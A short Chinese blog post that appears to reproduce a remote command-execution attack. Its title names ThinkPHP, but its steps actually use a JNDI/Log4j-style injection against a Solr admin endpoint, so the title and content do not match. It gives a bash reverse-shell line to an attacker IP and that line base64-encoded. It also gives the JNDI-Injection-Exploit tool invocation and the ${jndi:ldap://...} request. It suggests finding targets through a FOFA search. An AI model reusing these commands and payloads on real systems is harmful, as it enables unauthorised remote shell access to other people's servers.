thinkphp之命令执行漏洞复现

实战:

fofa搜索thinkphp--

第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果

返回dnslog查看到了Java的版本信息

打开kali监听端口

进行base64编码

复制代码
bash -i >& /dev/tcp/192.168.189.150/8080 0>&1

我编码后的是

复制代码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx

复制语句、

复制代码
# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl
#我的命令语句是
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx}|{base64,-d}|bash" -A 192.168.189.150
​
复制代码
访问一下kali里面得到的1.8版本的ldmp:/solr/admin/cores?action=${jndi:ldap://192.168.189.150:1389/jj9zyn
}

kali里面就可以监听的到了

相关推荐
用户962377954481 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
郑州光合科技余经理9 天前
代码展示:PHP搭建海外版外卖系统源码解析
java·开发语言·前端·后端·系统架构·uni-app·php